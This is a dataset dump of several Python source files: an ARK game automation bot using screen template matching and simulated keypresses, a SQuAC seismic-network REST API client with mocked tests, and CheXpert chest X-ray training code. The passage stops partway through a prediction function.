index
int64 | repo_name
string | branch_name
string | path
string | content
string | import_graph
string |
|---|---|---|---|---|---|
27,799
|
OpenElement-GachaBot/OpenElement
|
refs/heads/main
|
/ark.py
|
import time
import pyautogui
import screen
import cv2
import numpy as np
# Edge-detected template used to recognise the open-inventory screen.
inventory_template = cv2.imread("templates/inventory_template.png", cv2.IMREAD_GRAYSCALE)
inventory_template = cv2.Canny(inventory_template, 100, 200)
# Edge-detected template for the corner of the bed "spawn" button.
img = cv2.imread("templates/bed_button_corner.png", cv2.IMREAD_GRAYSCALE)
bed_button_edge = cv2.Canny(img,100,200)
# Seconds to hold the arrow keys when tilting the camera (hand-tuned).
lookUpDelay = 3
lookDownDelay = 1.75
# Frame-rate cap applied via the in-game console after the first spawn.
setFps = 25
# True until the first successful bed spawn (gates one-time setup).
firstRun = True
def limitFps():
    """Open the console and cap the game frame rate at the configured setFps."""
    global setFps
    pyautogui.press("tab")  # 'tab' toggles the in-game console
    time.sleep(0.2)         # give the console time to gain focus
    command = "t.maxfps {}".format(setFps)
    pyautogui.typewrite(command, interval=0.02)
    pyautogui.press("enter")
def setGamma():
    """Open the console and force gamma to 5 (brightens dark scenes)."""
    console_cmd = "gamma 5"
    pyautogui.press("tab")  # toggle console
    time.sleep(0.2)         # wait for the console to accept input
    pyautogui.typewrite(console_cmd, interval=0.02)
    pyautogui.press("enter")
def setParams(up, down, fps):
    """Override the module-level camera-delay and FPS configuration."""
    global lookUpDelay, lookDownDelay, setFps
    lookUpDelay, lookDownDelay, setFps = up, down, fps
def lookUp():
    """Hold the up-arrow for lookUpDelay seconds to tilt the camera up."""
    key = 'up'
    pyautogui.keyDown(key)
    time.sleep(lookUpDelay)  # module-level delay, tunable via setParams()
    pyautogui.keyUp(key)
def lookDown():
    """Hold the down-arrow for lookDownDelay seconds to tilt the camera down."""
    key = 'down'
    pyautogui.keyDown(key)
    time.sleep(lookDownDelay)  # module-level delay, tunable via setParams()
    pyautogui.keyUp(key)
def enterBedName(name):
    """Click the bed-search field, clear it, and type the target bed name."""
    pyautogui.moveTo(336, 986, duration=0.1)  # bed search field
    pyautogui.click()
    pyautogui.hotkey('ctrl', 'a')  # select any previous query
    pyautogui.press('backspace')   # ...and delete it
    pyautogui.typewrite(name, interval=0.05)
    time.sleep(0.5)
def checkBedButtonEdge():
    """Return True when the bed "spawn" button edge is visible on screen.

    Matches a Canny edge map of the fixed crop [950:1100, 580:620] against
    the precomputed bed_button_edge template and compares the TM_CCOEFF
    peak to an empirically chosen threshold.
    """
    img = screen.getGrayScreen()[950:1100, 580:620]
    img = cv2.Canny(img, 100, 200)
    res = cv2.matchTemplate(img, bed_button_edge, cv2.TM_CCOEFF)
    _, max_val, _, _ = cv2.minMaxLoc(res)
    # FIX: removed the leftover debug print(max_val) that polluted stdout.
    return max_val > 2500000
def bedSpawn(bedName, x, y):
    """Search the spawn map for bedName, click the bed at (x, y) and spawn.

    On the first successful spawn also runs the one-time setup (FPS cap
    and gamma). Returns True when the spawn button was detected and
    clicked, False otherwise.
    """
    global firstRun
    time.sleep(1.5)
    enterBedName(bedName)
    time.sleep(0.25)
    pyautogui.moveTo(x, y)
    time.sleep(0.25)
    pyautogui.click()
    time.sleep(0.25)
    # BUG FIX: the original wrote `if(checkBedButtonEdge):`, testing the
    # function object itself (always truthy) instead of calling it, so the
    # failure branch was unreachable.
    if checkBedButtonEdge():
        pyautogui.moveTo(755, 983)  # spawn button
        time.sleep(0.25)
        pyautogui.click()
        time.sleep(12)  # wait out the spawn loading screen
        pyautogui.press('c')  # crouch after spawning
        if firstRun:
            firstRun = False
            limitFps()
            setGamma()
        return True
    return False
def inventoryIsOpen():# {{{
    """Return True when the inventory template matches the current screen."""
    edges = cv2.Canny(screen.getGrayScreen(), 100, 200)
    result = cv2.matchTemplate(edges, inventory_template, cv2.TM_CCOEFF)
    _, peak, _, _ = cv2.minMaxLoc(result)
    if peak > 40000000:  # empirically chosen TM_CCOEFF threshold
        return True
    return False
def closeInventory():# {{{
    """Click the inventory close (X) button until the inventory is gone."""
    while inventoryIsOpen():
        pyautogui.moveTo(1816, 37)  # inventory close button
        pyautogui.click()
        time.sleep(2.0)  # UI needs time to settle before re-checking
        if not inventoryIsOpen():
            return
def craft(item, timesToPressA):
    """Search the structure inventory for item and queue crafts of it."""
    searchStructureStacks(item)
    pyautogui.moveTo(1290, 280)  # first search result slot
    pyautogui.click()
    for _ in range(timesToPressA):
        pyautogui.press('a')  # 'a' queues one craft
        time.sleep(0.25)
def searchMyStacks(thing):# {{{
    """Type a query into the player-inventory search box."""
    pyautogui.moveTo(144, 191)  # own-inventory search field
    pyautogui.click()
    time.sleep(0.5)
    # select-all so the new query replaces the old one
    pyautogui.keyDown('ctrl')
    time.sleep(0.2)
    pyautogui.press('a')
    pyautogui.keyUp('ctrl')
    pyautogui.typewrite(thing, interval=0.02)
    time.sleep(0.5)
def searchStructureStacks(thing):# {{{
    """Type a query into the structure-inventory search box."""
    pyautogui.moveTo(1322, 191)  # structure-inventory search field
    pyautogui.click()
    time.sleep(0.5)
    # select-all so the new query replaces the old one
    pyautogui.keyDown('ctrl')
    time.sleep(0.2)
    pyautogui.press('a')
    pyautogui.keyUp('ctrl')
    pyautogui.typewrite(thing, interval=0.02)
    time.sleep(0.5)
# }}}
def takeStacks(thing, count):# {{{
    """Search the structure inventory for `thing` and take `count` stacks."""
    searchStructureStacks(thing)
    pyautogui.moveTo(1287, 290)  # first matching slot
    pyautogui.click()
    for _ in range(count):
        pyautogui.press('t')  # 't' transfers one stack
        time.sleep(1)
# }}}
def takeAll(thing = ""):
if(thing != ""):
time.sleep(0.5)
pyautogui.moveTo(1285, 180)
pyautogui.click()
time.sleep(0.1)
pyautogui.keyDown('ctrl')
pyautogui.press('a')
pyautogui.keyUp('ctrl')
pyautogui.typewrite(thing, interval=0.01)
time.sleep(0.5)
pyautogui.moveTo(1424, 190)
pyautogui.click()
time.sleep(0.5)
def transferAll(thing = ""):# {{{
if(thing != ""):
pyautogui.moveTo(198, 191)
pyautogui.click()
time.sleep(0.2)
pyautogui.keyDown('ctrl')
pyautogui.press('a')
pyautogui.keyUp('ctrl')
pyautogui.typewrite(thing, interval=0.005)
time.sleep(0.5)
pyautogui.moveTo(351, 186)
pyautogui.click()
time.sleep(0.5)
def transferStacks(thing, count):# {{{
    """Search own inventory for `thing` and transfer `count` stacks out."""
    pyautogui.moveTo(198, 191)  # own-inventory search box
    pyautogui.click()
    time.sleep(0.2)
    pyautogui.hotkey('ctrl', 'a')  # replace any previous query
    pyautogui.typewrite(thing, interval=0.005)
    time.sleep(0.5)
    pyautogui.moveTo(170, 280)  # first matching slot
    pyautogui.click()
    time.sleep(1.0)
    for _ in range(count):
        pyautogui.press('t')  # 't' transfers one stack
        time.sleep(0.5)
def openInventory():
    """Press 'f' until the inventory opens.

    Returns True once the inventory is detected, False after six failed
    retries.
    """
    pyautogui.press('f')
    time.sleep(2.0)
    attempts = 0
    while not inventoryIsOpen() and attempts < 6:
        attempts += 1
        pyautogui.press('f')
        time.sleep(2.0)
        # a bed map popping up steals the keypress; dismiss it and retry
        if getBedScreenCoords() is not None:
            pyautogui.press('esc')
            time.sleep(2.0)
    return attempts < 6
def tTransferTo(nRows):
    """Press 't' across nRows x 6 own-inventory slots (send to structure)."""
    time.sleep(0.5)
    pyautogui.moveTo(167, 280, 0.1)
    pyautogui.click()
    for _ in range(nRows):  # transfer a few rows back to the gacha
        for col in range(6):
            pyautogui.moveTo(167 + (col * 95), 280, 0.1)
            pyautogui.press('t')
def tTransferFrom(nRows):
    """Press 't' across nRows x 6 structure-inventory slots (take out)."""
    pyautogui.moveTo(1288, 280, 0.1)
    pyautogui.click()
    for _ in range(nRows):
        for col in range(6):
            pyautogui.moveTo(1288 + (col * 95), 280, 0.1)
            pyautogui.press('t')
def getBedScreenCoords():
    """Locate the blue bed icon on the current screen.

    Both the live frame and the bed template are masked to a narrow blue
    HSV band, converted to grayscale, and template-matched. Returns the
    approximate icon centre (x, y), or None when no match clears the
    threshold.
    """
    frame = screen.getScreen()
    lower_blue = np.array([90,200,200])
    upper_blue = np.array([100,255,255])
    # keep only the blue pixels of the live frame
    frame_hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)
    frame_mask = cv2.inRange(frame_hsv, lower_blue, upper_blue)
    frame_blue = cv2.bitwise_and(frame, frame, mask=frame_mask)
    frame_gray = cv2.cvtColor(frame_blue, cv2.COLOR_BGR2GRAY)
    # apply the identical masking to the template so both images match
    template = cv2.imread('templates/bed_icon_template.png', cv2.IMREAD_COLOR)
    template_hsv = cv2.cvtColor(template, cv2.COLOR_BGR2HSV)
    template_mask = cv2.inRange(template_hsv, lower_blue, upper_blue)
    template_blue = cv2.bitwise_and(template, template, mask=template_mask)
    template_gray = cv2.cvtColor(template_blue, cv2.COLOR_BGR2GRAY)
    res = cv2.matchTemplate(frame_gray, template_gray, cv2.TM_CCOEFF)
    _, max_val, _, max_loc = cv2.minMaxLoc(res)
    if max_val > 8000000:
        # +14 shifts from the match corner to roughly the icon centre
        return (max_loc[0]+14, max_loc[1]+14)
    return None
def dropItems(thing):
    """Search own inventory for `thing` and click the drop-all button."""
    pyautogui.moveTo(198, 191)  # own-inventory search box
    pyautogui.click()
    time.sleep(0.2)
    pyautogui.hotkey('ctrl', 'a')  # replace any previous query
    pyautogui.typewrite(thing, interval=0.02)
    time.sleep(0.5)
    pyautogui.moveTo(412, 190)  # drop-all button
    pyautogui.click()
def accessBed():
    """Tilt the camera down until a bed icon appears, then access it."""
    while getBedScreenCoords() is None:
        lookDown()
    pyautogui.press('e')  # interact with the bed
    time.sleep(1.5)
    # pressing 'e' may have opened our own inventory instead; close it
    if inventoryIsOpen():
        closeInventory()
def takeAllOverhead():
    """Look up at the overhead container, loot everything, look back down."""
    lookUp()
    openInventory()
    takeAll()
    closeInventory()
    lookDown()
def depositOverhead():
    """Look up, press 'e' to deposit into the overhead container, look down."""
    lookUp()
    pyautogui.press('e')
    lookDown()
|
{"/gacha.py": ["/ark.py"]}
|
27,805
|
pnsn/squacapipy-old
|
refs/heads/master
|
/test/test_squacapi.py
|
from squacapipy.squacapi import Response, Network, Channel
from unittest.mock import patch
'''to run
$:pytest --verbose -s test/test_squacapi.py && flake8
or
pytest && flake8
'''
'''Tests are really just testing class instantiaion since the response
object is mocked.
'''
@patch.object(Network, 'get')
def test_get_networks(mock_get):
    """should get all networks (response object is mocked)"""
    canned = Response(200, [{'code': 'uw'}, {'code': 'cc'}], {})
    mock_get.return_value = canned
    net = Network()
    result = net.get()
    assert result.status_code == 200
    assert len(result.body) > 1
@patch.object(Network, 'post')
def test_create_network(mock_post):
    """posting a payload should return the mocked 201 response"""
    mock_post.return_value = Response(201, [{'code': 'uw'}], {})
    net = Network()
    result = net.post({'code': 'f2', 'name': 'FU'})
    assert result.status_code == 201
@patch.object(Network, 'put')
def test_update_network(mock_put):
    """putting a payload should return the mocked 200 response"""
    body = [{'code': 'f1', 'name': 'FR',
             'description': 'This is the description'}]
    mock_put.return_value = Response(200, body, {})
    net = Network()
    payload = {
        'code': 'f2',
        'name': 'FR',
        'description': "This is the description"
    }
    result = net.put('f2', payload)
    assert result.status_code == 200
@patch.object(Channel, 'get')
def test_get_channels(mock_get):
    """should get all channels (response object is mocked)"""
    channel_rows = [
        {'code': 'EHZ', 'name': "EHZ", 'station_code': 'RCM',
         'station_name': 'Muir', "sample_rate": 200, 'loc': '--',
         'lat': 45.0, 'lon': -122.0, 'elev': 2000, 'network_id': 1},
        {'code': 'EHE', 'name': "EHE", 'station_code': 'RCM',
         'station_name': 'Muir', "sample_rate": 200, 'loc': '--',
         'lat': 45.0, 'lon': -122.0, 'elev': 2000, 'network_id': 1}]
    mock_get.return_value = Response(200, channel_rows, {})
    channel = Channel()
    result = channel.get()
    assert result.status_code == 200
    assert len(result.body) > 1
|
{"/test/test_squacapi.py": ["/squacapipy/squacapi.py"], "/squacapipy/squacapi.py": ["/squacapipy/errors.py"]}
|
27,806
|
pnsn/squacapipy-old
|
refs/heads/master
|
/squacapipy/errors.py
|
'''error classes '''
class APITokenMissingError(Exception):
    '''Raised at import time when the SQUAC_API_TOKEN env var is unset.'''
    pass
class APIBaseUrlError(Exception):
    '''Raised at import time when the SQUAC_API_BASE env var is unset.'''
    pass
|
{"/test/test_squacapi.py": ["/squacapipy/squacapi.py"], "/squacapipy/squacapi.py": ["/squacapipy/errors.py"]}
|
27,807
|
pnsn/squacapipy-old
|
refs/heads/master
|
/squacapipy/squacapi.py
|
import requests
import os
import json
from squacapipy.errors import APITokenMissingError, APIBaseUrlError
from datetime import datetime
# Client configuration is read from the environment once, at import time.
API_TOKEN = os.getenv('SQUAC_API_TOKEN')
API_BASE_URL = os.getenv('SQUAC_API_BASE')
# Fail fast: every client method needs both values, so raise a clear error
# at import rather than an obscure one on the first request.
if API_TOKEN is None:
    raise APITokenMissingError(
        "All methods require an API key"
    )
if API_BASE_URL is None:
    raise APIBaseUrlError(
        "All methods require a base API url"
    )
# The token is sent verbatim in the Authorization header (no scheme prefix).
HEADERS = {'Content-Type': 'application/json',
           'Authorization': API_TOKEN}
def serialize_object(obj):
    '''json.dumps `default` hook for objects that don't natively serialize.

    Datetimes are rendered with str(). Any other type raises TypeError,
    matching the json module's contract for `default` -- the original
    silently returned None, which json encoded as null and hid data errors.
    '''
    if isinstance(obj, datetime):
        return obj.__str__()
    raise TypeError(
        "Object of type %s is not JSON serializable" % type(obj).__name__)
class Response():
    '''simple custom response object

    Wraps the pieces of an HTTP response the client cares about:
    status_code (int), body (decoded JSON as python dict/list), and
    response_header (headers returned by the server).
    '''
    def __init__(self, status_code, body, response_header):
        self.status_code = status_code
        self.body = body
        self.response_header = response_header

    def __repr__(self):
        # added for debuggability; body may be large so only the status shows
        return "Response(status_code={!r})".format(self.status_code)
class SquacapiBase():
    '''Base class for SQuAC API resources.

    Subclasses supply an `app` (URL namespace) and `resource` (collection
    name); this class implements the HTTP verbs against
    API_BASE_URL/app/resource/.
    '''
    def __init__(self, app, resource):
        # fixed stray space: was `self. app = app`
        self.app = app
        self.resource = resource

    def uri(self):
        '''Collection URI, always ending with a slash.'''
        return API_BASE_URL + "/" + self.app + "/" + self.resource + "/"

    def make_response(self, response):
        '''raise for errors, returns Response obj'''
        try:
            response.raise_for_status()
        except requests.exceptions.HTTPError as e:
            # HTTP errors still carry a JSON body; surface it uniformly
            return Response(e.response.status_code,
                            json.loads(e.response.text), e.response.headers)
        return Response(response.status_code,
                        json.loads(response.text), response.headers)

    def get(self, **kwargs):
        '''get resources; kwargs become query-string parameters'''
        uri = self.uri()
        response = requests.get(uri, headers=HEADERS, params=kwargs)
        return self.make_response(response)

    def post(self, payload):
        '''create resources from a dict payload'''
        uri = self.uri()
        response = requests.post(
            uri,
            headers=HEADERS,
            data=json.dumps(payload, default=serialize_object))
        return self.make_response(response)

    def put(self, id, payload):
        '''update resource

        Must have trailing slash after id!!
        '''
        uri = self.uri() + id + "/"
        # consistency fix: use the same datetime-aware serializer as post(),
        # so payloads containing datetimes don't fail only on update
        response = requests.put(uri, headers=HEADERS,
                                data=json.dumps(payload,
                                                default=serialize_object))
        return self.make_response(response)
# Nslc classes:
#  * NslcBase inherits from SquacapiBase
#  * Network, Channel, and Group inherit from NslcBase
class NslcBase(SquacapiBase):
    """Base for resources under the 'nslc' app namespace."""
    def __init__(self, resource):
        super().__init__("nslc", resource)

class Network(NslcBase):
    """The /nslc/networks/ resource."""
    def __init__(self):
        super().__init__("networks")

class Channel(NslcBase):
    """The /nslc/channels/ resource."""
    def __init__(self):
        super().__init__("channels")

class Group(NslcBase):
    """The /nslc/groups/ resource."""
    def __init__(self):
        super().__init__("groups")
# Measurement classes:
#  * MeasurementBase inherits from SquacapiBase
#  * Metric and Measurement inherit from MeasurementBase
class MeasurementBase(SquacapiBase):
    """Base for resources under the 'measurement' app namespace."""
    def __init__(self, resource):
        super().__init__("measurement", resource)

class Metric(MeasurementBase):
    """The /measurement/metrics/ resource."""
    def __init__(self):
        super().__init__("metrics")

class Measurement(MeasurementBase):
    """The /measurement/measurements/ resource."""
    def __init__(self):
        super().__init__("measurements")
class DashboardBase(SquacapiBase):
    """Base for resources under the 'dashboard' app namespace."""
    def __init__(self, resource):
        super().__init__("dashboard", resource)

class Dashboard(DashboardBase):
    """The /dashboard/dashboards/ resource."""
    def __init__(self):
        super().__init__("dashboards")

class Widget(DashboardBase):
    """The /dashboard/widgets/ resource."""
    def __init__(self):
        super().__init__("widgets")

class WidgetType(DashboardBase):
    """The /dashboard/widgettypes/ resource."""
    def __init__(self):
        super().__init__("widgettypes")
|
{"/test/test_squacapi.py": ["/squacapipy/squacapi.py"], "/squacapipy/squacapi.py": ["/squacapipy/errors.py"]}
|
27,811
|
Alaqian/chexpert_old
|
refs/heads/master
|
/trainCnn.py
|
# -*- coding: utf-8 -*-
"""
Created on Sat Jul 20 21:16:02 2019
@author: Mirac
"""
def train_cnn(PATH_TO_MAIN_FOLDER, LR, WEIGHT_DECAY, UNCERTAINTY="zeros", USE_MODEL=0):
    """
    Train a model with chexpert data using the given hyperparameters
    Args:
        PATH_TO_MAIN_FOLDER: path where the extracted chexpert data is located
        LR: learning rate
        WEIGHT_DECAY: weight decay parameter for SGD
        UNCERTAINTY: the uncertainty method to be used in training
            (the branches below handle "ignore", "multiclass",
            "weighted_multiclass", "weighted_zeros"; anything else gets BCELoss)
        USE_MODEL: specify the checkpoint object if you want to continue
            training; 0 (default) starts from an ImageNet-pretrained DenseNet-121
    Returns:
        preds: torchvision model predictions on test fold with ground truth for comparison
        aucs: AUCs for each train,test tuple

    NOTE(review): relies on names imported elsewhere in this module (os,
    rmtree, transforms, torch, models, nn, optim, use_gpu, CheXpertDataset,
    the loss classes, train_model, make_pred_multilabel) -- confirm imports.
    """
    NUM_EPOCHS = 8
    BATCH_SIZE = 32
    if USE_MODEL == 0:
        # fresh run: wipe any previous results for this uncertainty method
        try:
            rmtree(os.path.join('results',UNCERTAINTY))
        except BaseException:
            pass # directory doesn't yet exist, no need to clear it
        os.makedirs(os.path.join('results',UNCERTAINTY))
    # use imagenet mean,std for normalization
    mean = [0.485, 0.456, 0.406]
    std = [0.229, 0.224, 0.225]
    N_LABELS = 14 # we are predicting 14 labels
    # define torchvision transforms
    # NOTE(review): transforms.Scale is the pre-0.2 name of transforms.Resize
    # and was removed in later torchvision releases -- confirm pinned version.
    data_transforms = {
        'train': transforms.Compose([
            transforms.RandomHorizontalFlip(),
            transforms.Scale(224),
            # because scale doesn't always give 224 x 224, this ensures 224 x
            # 224
            transforms.CenterCrop(224),
            transforms.ToTensor(),
            transforms.Normalize(mean, std)
        ]),
        'valid': transforms.Compose([
            transforms.Scale(224),
            transforms.CenterCrop(224),
            transforms.ToTensor(),
            transforms.Normalize(mean, std)
        ]),
    }
    # create train/val dataloaders
    transformed_datasets = {}
    transformed_datasets['train'] = CheXpertDataset(
        path_to_main_folder=PATH_TO_MAIN_FOLDER,
        fold='train',
        transform=data_transforms['train'],
        uncertainty=UNCERTAINTY)
    transformed_datasets['valid'] = CheXpertDataset(
        path_to_main_folder=PATH_TO_MAIN_FOLDER,
        fold='valid',
        transform=data_transforms['valid'],
        uncertainty=UNCERTAINTY)
    dataloaders = {}
    dataloaders['train'] = torch.utils.data.DataLoader(
        transformed_datasets['train'],
        batch_size=BATCH_SIZE,
        shuffle=True,
        num_workers=8)
    dataloaders['valid'] = torch.utils.data.DataLoader(
        transformed_datasets['valid'],
        batch_size=BATCH_SIZE,
        shuffle=True,
        num_workers=8)
    # please do not attempt to train without GPU as will take excessively long
    if not use_gpu:
        raise ValueError("Error, requires GPU")
    if not USE_MODEL == 0:
        # resuming: USE_MODEL is a checkpoint dict with 'model' and 'epoch'
        model = USE_MODEL['model']
        starting_epoch = USE_MODEL['epoch']
    else:
        starting_epoch = 0
        model = models.densenet121(pretrained=True)
        num_ftrs = model.classifier.in_features
        # add final layer with # outputs in same dimension of labels with sigmoid
        # activation
        if UNCERTAINTY in ["multiclass", 'weighted_multiclass']:
            # 3 outputs per label for the 3-way (neg/pos/uncertain) schemes
            model.classifier = nn.Sequential(
                nn.Linear(num_ftrs, 3 * N_LABELS), nn.Sigmoid())
        else:
            model.classifier = nn.Sequential(
                nn.Linear(num_ftrs, N_LABELS), nn.Sigmoid())
    # put model on GPU
    model = model.cuda()
    # define criterion, optimizer for training
    if UNCERTAINTY == "ignore":
        criterion = BCEwithIgnore()
    elif UNCERTAINTY == "multiclass":
        criterion = nn.CrossEntropyLoss()
    elif UNCERTAINTY == 'weighted_multiclass':
        # per-label class weights derived from the training-set label counts
        label_weights = torch.tensor(transformed_datasets['train'].getWeights(uncertainty='weighted_multiclass'))
        label_weights = label_weights.to(torch.device("cuda"))
        criterion = WeightedCrossEntropy(label_weights)
    elif UNCERTAINTY == "weighted_zeros":
        label_weights = torch.tensor(transformed_datasets['train'].getWeights())
        label_weights = label_weights.to(torch.device("cuda"))
        criterion = WeightedBCE(label_weights)
    else:
        # "zeros"/"ones" remap labels in the dataset, so plain BCE suffices
        criterion = nn.BCELoss()
    optimizer = optim.SGD(
        filter(
            lambda p: p.requires_grad,
            model.parameters()),
        lr=LR,
        momentum=0.9,
        weight_decay=WEIGHT_DECAY)
    dataset_sizes = {x: len(transformed_datasets[x]) for x in ['train', 'valid']}
    # train model
    model, best_epoch = train_model(model, criterion, optimizer, LR, num_epochs=NUM_EPOCHS,
                    dataloaders=dataloaders, dataset_sizes=dataset_sizes, weight_decay=WEIGHT_DECAY,
                    uncertainty=UNCERTAINTY,
                    starting_epoch=starting_epoch)
    # get preds and AUCs on test fold
    preds, aucs = make_pred_multilabel(data_transforms,
                                       model,
                                       PATH_TO_MAIN_FOLDER,
                                       UNCERTAINTY,
                                       N_LABELS)
    return preds, aucs
|
{"/camUtils.py": ["/chexpertDataset.py"]}
|
27,812
|
Alaqian/chexpert_old
|
refs/heads/master
|
/chexpertDataset.py
|
# -*- coding: utf-8 -*-
"""
Created on Sat Jul 20 21:10:18 2019
@author: Mirac
"""
import pandas as pd
import numpy as np
from torch.utils.data import Dataset
import os
from PIL import Image
from sklearn.model_selection import train_test_split
class CheXpertDataset(Dataset):
    """
    Dataset class for the chexpert dataset
    Args:
        path_to_main_folder: path where the extracted chexpert data is located
        fold: choose 'train', 'valid' or 'test'
        transform: torchvision transforms to be applied to raw images
        uncertainty: the uncertainty method to be used in training
    """
    def __init__(
            self,
            path_to_main_folder,
            fold,
            transform=None,
            uncertainty="zeros"):
        self.transform = transform
        self.path_to_main_folder = path_to_main_folder
        if fold == 'test': #Use the validation set in the chexpert dataset as the test set
            self.df = pd.read_csv(os.path.join(path_to_main_folder,
                                               'CheXpert-v1.0-small',
                                               'valid.csv'))
        elif fold == 'train': #Use 80% of the train set in the chexpert dataset as the train set
            self.df = pd.read_csv(os.path.join(path_to_main_folder,
                                               'CheXpert-v1.0-small',
                                               'train.csv'))
            # fixed random_state keeps the train/valid splits disjoint & stable
            self.df, _ = train_test_split(self.df, test_size=0.2, random_state=42)
        elif fold == 'valid': #Use 20% of the train set in the chexpert dataset as the validation set
            self.df = pd.read_csv(os.path.join(path_to_main_folder,
                                               'CheXpert-v1.0-small',
                                               'train.csv'))
            _, self.df = train_test_split(self.df, test_size=0.2, random_state=42)
        # NOTE(review): an unrecognized fold leaves self.df unset and fails below
        self.df = self.df.set_index("Path") #Use the path of the image directory as the index
        self.df = self.df.drop(['Sex', 'Age', 'Frontal/Lateral','AP/PA'], axis=1) #Drop these columns because we won't be needing them
        self.df = self.df.fillna(value=0) #Fill in the missing values with zeros (negative)
        if uncertainty == 'zeros': #If the zeros uncertainty method is used, treat all uncertain labels as zeros
            self.df = self.df.replace(-1, 0)
        elif uncertainty == 'ones': #If the ones uncertainty method is used, treat all uncertain labels as ones
            self.df = self.df.replace(-1, 1)
        elif uncertainty == 'weighted_zeros':
            # weighted_zeros also maps uncertain -> 0; the weighting happens in the loss
            self.df = self.df.replace(-1,0)
        self.PRED_LABEL = [
            'No Finding',
            'Enlarged Cardiomediastinum',
            'Cardiomegaly',
            'Lung Opacity',
            'Lung Lesion',
            'Edema',
            'Consolidation',
            'Pneumonia',
            'Atelectasis',
            'Pneumothorax',
            'Pleural Effusion',
            'Pleural Other',
            'Fracture',
            'Support Devices'] #These are the 14 labels we try to predict

    def __len__(self):
        # number of images (rows) in the selected fold
        return len(self.df)

    def __getitem__(self, idx):
        """Return (image, label_vector, image_path) for row idx."""
        image = Image.open(
            os.path.join(
                self.path_to_main_folder,
                self.df.index[idx]))
        image = image.convert('RGB')
        label = np.zeros(len(self.PRED_LABEL), dtype=int)
        for i in range(0, len(self.PRED_LABEL)):
            # can leave zero if zero, else make one
            # (keeps -1 for the "ignore"/multiclass schemes that use it)
            if(self.df[self.PRED_LABEL[i].strip()].iloc[idx].astype('int') in set([-1,1])):
                label[i] = self.df[self.PRED_LABEL[i].strip()
                                   ].iloc[idx].astype('int')
        if self.transform:
            image = self.transform(image)
        return (image, label,self.df.index[idx])

    def getWeights(self, uncertainty='weighted_zeros'): #The weight array for weighted cross entropy methods
        """Return per-label weights derived from this fold's label counts.

        'weighted_zeros' gives a (14,) positive-class weight array;
        'weighted_multiclass' gives a (14, 3) array of per-class weights.
        """
        if uncertainty == 'weighted_zeros':
            # weight positives by twice the negative frequency
            positives = self.df.sum(axis=0)[-14:] / self.df.shape[0]
            negatives = 1 - positives
            weights = 2 * negatives
        elif uncertainty == 'weighted_multiclass':
            # inverse-frequency weights for the uncertain/negative/positive classes
            counts = self.df.count()[-14:]
            uncertains = self.df.isin([-1]).sum(axis=0)[-14:]
            positives = self.df.isin([1]).sum(axis=0)[-14:]
            negatives = self.df.isin([0]).sum(axis=0)[-14:]
            weights = [(counts - uncertains) / counts * 3/2, \
                       (counts - negatives) / counts * 3/2, \
                       (counts - positives) / counts * 3/2]
            weights = np.transpose(np.array(weights))
        return weights
|
{"/camUtils.py": ["/chexpertDataset.py"]}
|
27,813
|
Alaqian/chexpert_old
|
refs/heads/master
|
/lossFunctions.py
|
# -*- coding: utf-8 -*-
"""
Created on Sat Jul 20 21:15:28 2019
@author: Mirac
"""
import torch
class BCEwithIgnore(torch.nn.Module):
    """Binary cross entropy that excludes uncertain (-1) labels.

    Uncertain entries contribute to neither the positive nor the negative
    term, and the sum is normalized by the number of certain labels.
    """
    def __init__(self):
        # BUG FIX: this was `_init_` (single underscores), so it never ran as
        # the constructor, and its `super()._init_()` call would have raised
        # AttributeError if invoked explicitly.
        super(BCEwithIgnore, self).__init__()

    def forward(self, score, y):
        zeros = torch.zeros_like(y)
        ones = torch.ones_like(y)
        # count of labels marked uncertain (-1)
        num_uncertain = torch.sum(torch.where(y==-1, ones, zeros))
        # positive mask: uncertain -> 0 so the positive term drops out
        positive = torch.where(y==-1, zeros, y)
        # negative "keep" mask: uncertain -> 1 so (1 - negative) zeroes the term
        negative = torch.where(y==-1, ones, y)
        p = torch.log(score)
        one_minus_p = torch.log(1 - score)
        loss = -1 * torch.sum(p * positive + (1-negative) * one_minus_p) / ( y.numel() - num_uncertain)
        return loss
class WeightedBCE(torch.nn.Module):
    """Binary cross entropy with per-label weights.

    Positives are scaled by `weight`; negatives by (2 - weight), so a
    weight of 1 reduces to plain BCE.
    """
    def __init__(self, weight):
        super(WeightedBCE, self).__init__()
        self.w = weight

    def forward(self, score, y):
        pos_term = y * torch.log(score) * self.w
        neg_term = (1 - y) * torch.log(1 - score) * (2 - self.w)
        return -1 * torch.mean(pos_term + neg_term)
class WeightedCrossEntropy(torch.nn.Module):
    """3-way cross entropy with per-label, per-class weights.

    `output` carries 3 logits per label (flattened); `y` holds the class
    index (0/1/2) per label. The stored weight matrix is tiled to match
    the flattened batch (batch_size * 14 rows).
    """
    def __init__(self, weight):
        super(WeightedCrossEntropy, self).__init__()
        self.w = weight

    def forward(self, output, y):
        probs = torch.softmax(output.view(-1, 3), dim=1)
        targets = y.view(-1, 1)
        onehot = torch.zeros((targets.shape[0], 3), device=targets.device)
        onehot.scatter_(1, targets, 1)
        # tile the (14, 3) weights across the flattened batch
        tiled = self.w.repeat(len(targets) // 14, 1)
        weighted_log = (torch.log(probs).type(torch.double)
                        * onehot.type(torch.double)
                        * tiled.type(torch.double))
        return - torch.mean(weighted_log)
|
{"/camUtils.py": ["/chexpertDataset.py"]}
|
27,814
|
Alaqian/chexpert_old
|
refs/heads/master
|
/makePredictions.py
|
# -*- coding: utf-8 -*-
"""
Created on Sat Jul 20 21:16:51 2019
@author: Mirac
"""
import os

import numpy as np
import pandas as pd
import sklearn
import sklearn.metrics as sklm
import torch
from torch.autograd import Variable
from torch.utils.data import Dataset, DataLoader
from torchvision import transforms, utils

from chexpertDataset import CheXpertDataset
def make_pred_multilabel(data_transforms, model, PATH_TO_MAIN_FOLDER, UNCERTAINTY, N_LABELS, epoch=0):
    """
    Gives predictions for test fold and calculates AUCs using previously trained model
    Args:
        data_transforms: torchvision transforms to preprocess raw images; same as validation transforms
        model: the model trained on chexpert images
        PATH_TO_MAIN_FOLDER: path where the extracted chexpert data is located
        UNCERTAINTY: uncertainty scheme used at train time; the "*multiclass"
            modes emit 3 logits per label and are collapsed below
        N_LABELS: number of predicted labels (14 for CheXpert)
        epoch: when non-zero, output csv names are suffixed with the epoch
    Returns:
        pred_df: dataframe containing individual predictions and ground truth for each test image
        auc_df: dataframe containing aggregate AUCs by train/test tuples

    NOTE(review): `os` and `CheXpertDataset` must be in scope, and the
    pandas calls (`DataFrame.append`, `Series.as_matrix`) exist only in
    older pandas releases -- confirm the pinned versions before upgrading.
    """
    # calc preds in batches of 32, can reduce if your GPU has less RAM
    BATCH_SIZE = 32
